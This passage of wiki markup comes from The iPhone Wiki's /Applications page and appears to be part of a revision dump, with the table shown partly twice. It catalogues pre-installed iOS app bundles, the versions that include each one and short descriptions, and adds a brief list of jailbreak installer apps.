| Calculator. Icon evolved over major OS releases. Landscape scientific mode added in iOS 2.0.<br />
|-<br />
| {{ipfw|Camera.app}}<br />
| {{ipfw|Camera.app}} ([[iPad 2]] and newer only)<br />
| No Apple TV Version<br />
| Camera<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Camera. Split from {{ipfw|MobileSlideShow.app}} starting with iOS 4.0.<br />
|-<br />
| {{ipfw|Compass.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Compass<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Compass. Only available on [[Magnetometer|qualifying devices]].<br />
|-<br />
| {{ipfw|CompassCalibrationViewService.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|Contacts~iphone.app}} (MobileAddressBook.app before iOS 4)<br />
| {{ipfw|Contacts~ipad.app}}<br />
| No Apple TV Version<br />
| Contacts<br />
| {{partial}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Contacts.<br />
|-<br />
| {{ipfw|Copilot.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|DDActionsService.app}}<br />
| {{ipfw|DDActionsService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|DemoApp.app}}<br />
| {{ipfw|DemoApp.app}}<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Displays a video continuously when the device is not being used. Invoke with a file called Demo.mov in the user directory ([[/private/var/root]] for iOS 1.1.2 and lower, [[/private/var/mobile]] for iOS 1.1.3 and later). Used by Apple Stores.<br />
|-<br />
| {{ipfw|Diagnostics.app}} (Not to be confused with iOS Diagnostics.app, Diagnostics.app currently serves no purpose)<br />
| {{ipfw|Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Currently, this serves no clear purpose. It has lorem ipsum inside it, and accept and decline buttons.<br />
|-<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| {{ipfw|FacebookAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Facebook service.<br />
|-<br />
| {{ipfw|FaceTime.app}}<br />
| {{ipfw|FaceTime.app}}<br />
| No Apple TV Version<br />
| FaceTime<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[FaceTime]] application for devices running iOS 7 or later.<br />
|-<br />
| {{ipfw|Family.app}}<br />
| {{ipfw|Family.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Application for Family Sharing. Doesn't appear to work yet.<br />
|-<br />
| {{ipfw|FieldTest.app}}<br />
| {{ipfw|FieldTest.app}} (3G only)<br />
| No Apple TV Version<br />
| <br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{partial|See notes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for checking network parameters; Can be accessed by dialing [[Phone.app codes|<code>*3001#12345#*</code>]]; Retired in 4.0, returns in 4.1 providing only the cellular network RSSI display. iOS 4.2 brings all features back.<br />
|-<br />
| {{ipfw|GameCenterUIService.app}}<br />
| {{ipfw|GameCenterUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|GameCenter~iphone.app}}<br />
| {{ipfw|GameCenter~ipad.app}}<br />
| No Apple TV Version<br />
| Game Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Game Center.<br />
|-<br />
| {{ipfw|Health.app}}<br />
| {{ipfw|Health.app}}<br />
| No Apple TV Version<br />
| Health<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| The Health app. Works as the center of HealthKit enabled apps.<br />
|-<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| {{ipfw|HealthPrivacyService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| A service for Health.app, apparently in place to protect your privacy.<br />
|-<br />
| {{ipfw|iAdOptOut.app}}<br />
| {{ipfw|iAdOptOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iBooks.app}}<br />
| {{ipfw|iBooks.app}}<br />
| No Apple TV Version<br />
| iBooks<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| iBooks app built into iOS 8.<br />
|-<br />
| {{ipfw|InCallService.app}}<br />
| {{ipfw|InCallService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| {{ipfw|iOS Diagnostics.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| This can be accessed through Safari; just type diags:// into the URL bar.<br />
|-<br />
| {{ipfw|iPodOut.app}}<br />
| {{ipfw|iPodOut.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| Hidden app for iPodOut functionality with third party equipment such as car entertainment systems. Provides a media selection and notification view interface through the video output.<br />
|-<br />
| {{ipfw|iTunes.app}} (Not to be confused with MobileStore.app, the iTunes Store app)<br />
| {{ipfw|iTunes.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app. Crashes on startup. Purpose not known.<br />
|-<br />
| {{ipfw|kbd.app}}<br />
| {{ipfw|kbd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| <br />
|-<br />
| {{ipfw|MailCompositionService.app}}<br />
| {{ipfw|MailCompositionService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Maps~iphone.app}} (Maps.app on iOS 7)<br />
| {{ipfw|Maps~ipad.app}}<br />
| No Apple TV Version<br />
| Maps<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Maps.<br />
|-<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| {{ipfw|MessagesNotificationViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
|-<br />
| {{ipfw|MessagesViewService.app}}<br />
| {{ipfw|MessagesViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|MobileCal.app}}<br />
| {{ipfw|MobileCal.app}}<br />
| No Apple TV Version<br />
| Calendar<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calendar.<br />
|-<br />
| {{ipfw|MobileMail.app}}<br />
| {{ipfw|MobileMail.app}}<br />
| No Apple TV Version<br />
| Mail<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mail. Updated in iOS 4 and iOS 7.<br />
|-<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| {{ipfw|MobileMusicPlayer.app}}<br />
| No Apple TV Version<br />
| iPod; Music; Videos<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| iPod/Music/Videos. Uses the '''[[Application Roles]]''' feature to have more than one icon. Split into separate Music/Videos apps since iOS 5.<br />
|-<br />
| {{ipfw|MobileNotes.app}}<br />
| {{ipfw|MobileNotes.app}}<br />
| No Apple TV Version<br />
| Notes<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Notes.<br />
|-<br />
| {{ipfw|MobilePhone.app}}<br />
| {{ipfw|MobilePhone.app}} (iPad 2 and newer only, running iOS 6 and under)<br />
| No Apple TV Version<br />
| Phone; FaceTime for iOS 6 and under<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Only FaceTime is shown on the iPad and iPod touch. On iOS 7 FaceTime is an independent application. Uses the '''Application Roles''' feature to have more than one icon.<br />
|-<br />
| {{ipfw|MobileReplayer.app}}<br />
| {{ipfw|MobileReplayer.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| MobileReplayer's purpose isn't known. Crashes upon startup.<br />
|-<br />
| {{ipfw|MobileSafari.app}}<br />
| {{ipfw|MobileSafari.app}}<br />
| No Apple TV Version<br />
| Safari<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Mobile Safari web browser.<br />
|-<br />
| {{ipfw|MobileSlideShow.app}}<br />
| {{ipfw|MobileSlideShow.app}}<br />
| No Apple TV Version<br />
| Photos (iOS 4 and above); Photos, Camera (older OS versions)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Photo Albums, Places, Faces*, Events* and Import°.<br />
<br />
<nowiki>* </nowiki>Mac only.<br />
<br />
° with iPad Camera Connection Kit<br />
|-<br />
| {{ipfw|MobileSMS.app}}<br />
| {{ipfw|MobileSMS.app}}<br />
| No Apple TV Version<br />
| [[Messages]]; Text (iPhone OS < 2.2.1)<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| SMS, MMS and [[iMessage]]<br />
|-<br />
| {{ipfw|MobileStore.app}}<br />
| {{ipfw|MobileStore.app}}<br />
| No Apple TV Version<br />
| iTunes Store (iTunes prior to iOS 7)<br />
| {{partial|1.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The iTunes Store, allows purchasing of Music, Videos, Movies, TV Shows, and more.<br />
|-<br />
| {{ipfw|MobileTimer.app}} (MobileTimer~iphone.app on iOS 6 only)<br />
| {{ipfw|MobileTimer~ipad.app}} (only from iOS 6)<br />
| No Apple TV Version<br />
| Clock<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| World Clocks, Alarms, Stopwatch and countdown Timer.<br />
|-<br />
| {{ipfw|Music~iphone.app}} (Music.app on iOS 7)<br />
| {{ipfw|Music~ipad.app}}<br />
| No Apple TV Version<br />
| Music<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app. Icon is identical to the one previously only displayed on iPod touches.<br />
|-<br />
| {{ipfw|Nike.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Nike+iPod<br />
| {{no}}<br />
| {{partial|2.2.1}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Nike+iPod. Only on applicable devices (iPod touch 2G, iPhone 3G, and newer) when enabled in Settings.<br />
|-<br />
| {{ipfw|Podcasts.app}}<br />
| {{ipfw|Podcasts.app}}<br />
| No Apple TV Version<br />
| Podcasts<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Podcasts app built into iOS 8.<br />
|-<br />
| {{ipfw|PreBoard.app}}<br />
| {{ipfw|PreBoard.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown, crashes at start.<br />
|-<br />
| {{ipfw|Preferences.app}}<br />
| {{ipfw|Preferences.app}}<br />
| No Apple TV Version<br />
| Settings<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Settings.<br />
|-<br />
| {{ipfw|PrintStatus.app}}<br />
| {{ipfw|PrintStatus.app}}<br />
| No Apple TV Version<br />
| Print Center<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Print Center.<br />
|-<br />
| {{ipfw|quicklookd.app}}<br />
| {{ipfw|quicklookd.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Reminders.app}}<br />
| {{ipfw|Reminders.app}}<br />
| No Apple TV Version<br />
| Reminders<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Reminders application.<br />
|-<br />
| {{ipfw|Setup.app}}<br />
| {{ipfw|Setup.app}}<br />
| No Apple TV Version<br />
| Setup<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden setup app. Opens automatically after a restore.<br />
|-<br />
| {{ipfw|Passbook.app}} (Shoebox.app prior to iOS 7)<br />
| No iPad Version<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Passbook.<br />
|-<br />
| {{ipfw|SiriViewService.app}}<br />
| {{ipfw|SiriViewService.app}}<br />
| No Apple TV Version<br />
| Siri<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| [[Siri]] controller.<br />
|-<br />
| {{ipfw|ShoeboxUIService.app}} (PassbookUIService.app on iOS 7)<br />
| {{ipfw|ShoeboxUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
|<br />
|-<br />
| {{ipfw|SocialUIService.app}}<br />
| {{ipfw|SocialUIService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|Stocks.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Stocks<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Stocks. Updated in iPhone OS 3.0 and iOS 7.<br />
|-<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| {{ipfw|TencentWeiboAccountMigrationDialog.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Account Migration (??) for Tencent Weibo Accounts<br />
|-<br />
| {{ipfw|TrustMe.app}}<br />
| {{ipfw|TrustMe.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Related to SSL and certificates.<br />
|-<br />
| {{ipfw|UserAuthentication.app}}<br />
| {{ipfw|UserAuthentication.app}}<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown app. Does nothing when launched. Might be used for the iOS 8 Touch ID API.<br />
|-<br />
| {{ipfw|Videos.app}}<br />
| {{ipfw|Videos.app}}<br />
| No Apple TV Version<br />
| Videos<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Previously part of MobileMusicPlayer.app.<br />
|-<br />
| {{ipfw|VoiceMemos.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Voice Memos<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Voice Memos. Requires <code>encode-aac</code> capability and a microphone.<br />
|-<br />
| {{ipfw|Weather.app}}<br />
| {{ipfw|Weather.app}}<br />
| No Apple TV Version<br />
| Weather<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Weather. Updated for fast app switching support and hourly forecast and in iOS 6.<br />
|-<br />
| {{ipfw|Web.app}}<br />
| {{ipfw|Web.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Runs fullscreen web clips.<br />
|-<br />
| {{ipfw|WebApp1.app}}<br />
| {{ipfw|WebApp1.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| Unknown purpose, crashes on startup<br />
|-<br />
| {{ipfw|WebContentAnalysisUI.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|WebSheet.app}}<br />
| {{ipfw|WebSheet.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Used for overlaying web data. Usually for logging in to Wi-Fi Hotspots which use forced webpages to request user data.<br />
|-<br />
| {{ipfw|WebViewService.app}} (WebUIService prior to iOS 7)<br />
| {{ipfw|WebViewService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|WhatsNew.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|YouTube.app}}<br />
| {{ipfw|YouTube.app}}<br />
| No Apple TV Version<br />
| YouTube<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| Watch [http://youtube.com YouTube] videos; removed in iOS 6 beta 4 according with the Google License.<br />
|}<br />
<br />
==== Unofficial Apps ====<br />
These application bundles are not present on an unmodified system and are generally installed via a PC utility, manually or through a package. More applications may be installed after jailbreak.<br />
* [[Installer.app]] (AppTapp Installer)<br />
* [[blackra1n.app]] ([[blackra1n]] and [[limera1n]])<br />
* [[Cydia.app]] (Cydia Installer)<br />
<br />
=== Files ===<br />
(none)<br />
<br />
== Parents ==<br />
{{parent}}<br />
<br />
[[Category:Filesystem]]</div>
Ryandolan123
https://www.theiphonewiki.com/w/index.php?title=/Applications&diff=41344
/Applications
2014-06-19T18:58:36Z
<p>Ryandolan123: </p>
<hr />
<div>== Summary ==<br />
This is where all of the pre-installed native apps, as well as native jailbreak apps (from Cydia and elsewhere), are installed. They can't be deleted under normal circumstances. One can delete them on a jailbroken device through some sort of file-management tool such as SSH or iFile, although doing this is highly unrecommended as they can't be re-installed.<br />
<br />
New user apps are installed via iTunes or the App Store in the [[/private/var/mobile/Applications]] folder.<br />
<br />
== Children ==<br />
=== Folders ===<br />
*{{ipfw|Utilities}} <br />
==== Native Apps ====<br />
{| class="wikitable sortable" style="table-layout: fixed; border-collapse: collapse;" border="1"<br />
|-<br />
! Folder name (generic)<br />
! Folder name ([[iPad]] version)<br />
! Folder name ([[Apple TV]] version)<br />
! Application name<br />
! 1.x<br />
! 2.x<br />
! 3.x<br />
! 4.x <br />
! 5.x<br />
! 6.x<br />
! 7.x<br />
! 8.x (beta)<br />
! Description<br />
|-<br />
| {{ipfw|AACredentialRecoveryDialog.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|AdSheet.app}} (iAd.app in iOS 8)<br />
| {{ipfw|AdSheet~ipad.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Hidden app for [[iAd]] support (Both included on iPad)<br />
|-<br />
| No iPhone or iPod touch version<br />
| No iPad Version<br />
| {{ipfw|AppleTV.app}}<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{partial|4.1.1/4.2.1+}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| The Apple TV's equivalent of [[:/System/Library/CoreServices/SpringBoard.app|SpringBoard]]. Used on [[iOS]] 4.2 and higher. Prior to 4.2.1, it was known as Lowtide.app.<br />
|-<br />
| {{ipfw|AppStore.app}}<br />
| {{ipfw|AppStore.app}}<br />
| No Apple TV Version<br />
| App Store<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Client for the [[App Store]]<br />
|-<br />
| {{ipfw|AskPermissionUI.app}}<br />
| {{ipfw|AskPermissionUI.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| App for the UI for Family Sharing purchase confirmations<br />
|-<br />
| {{ipfw|BugReporter.app}}<br />
| {{ipfw|BugReporter.app}}<br />
| No Apple TV Version<br />
| Bug Reporter<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| An app for conveniently reporting bugs, specific to beta releases starting with iOS 8.<br />
|-<br />
| {{ipfw|Calculator.app}}<br />
| No iPad version<br />
| No Apple TV Version<br />
| Calculator<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Calculator. Icon evolved over major OS releases. Landscape scientific mode added in iOS 2.0.<br />
|-<br />
| {{ipfw|Camera.app}}<br />
| {{ipfw|Camera.app}} ([[iPad 2]] and newer only)<br />
| No Apple TV Version<br />
| Camera<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Camera. Split from {{ipfw|MobileSlideShow.app}} starting with iOS 4.0.<br />
|-<br />
| {{ipfw|Compass.app}}<br />
| No iPad Version<br />
| No Apple TV Version<br />
| Compass<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Compass. Only available on [[Magnetometer|qualifying devices]].<br />
|-<br />
| {{ipfw|CompassCalibrationViewService.app}}<br />
| ?<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| ?<br />
|-<br />
| {{ipfw|Contacts~iphone.app}} (MobileAddressBook.app before iOS 4)<br />
| {{ipfw|Contacts~ipad.app}}<br />
| No Apple TV Version<br />
| Contacts<br />
| {{partial}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| Contacts.<br />
|-<br />
| {{ipfw|Copilot.app}}<br />
| ?<br />
| No Apple TV Version<br />
|<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{no}}<br />
| ?<br />
|-<br />
| {{ipfw|DDActionsService.app}}<br />
| {{ipfw|DDActionsService.app}}<br />
| No Apple TV Version<br />
| <br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{no}}<br />
| {{yes}}<br />
| {{yes}}<br />
| {{yes}}<br />
| <br />
|-<br />
| {{ipfw|DemoApp.app}}<br />
| {{ipfw|DemoApp.app}}<br />
| No Apple TV Version<br />
| <br />
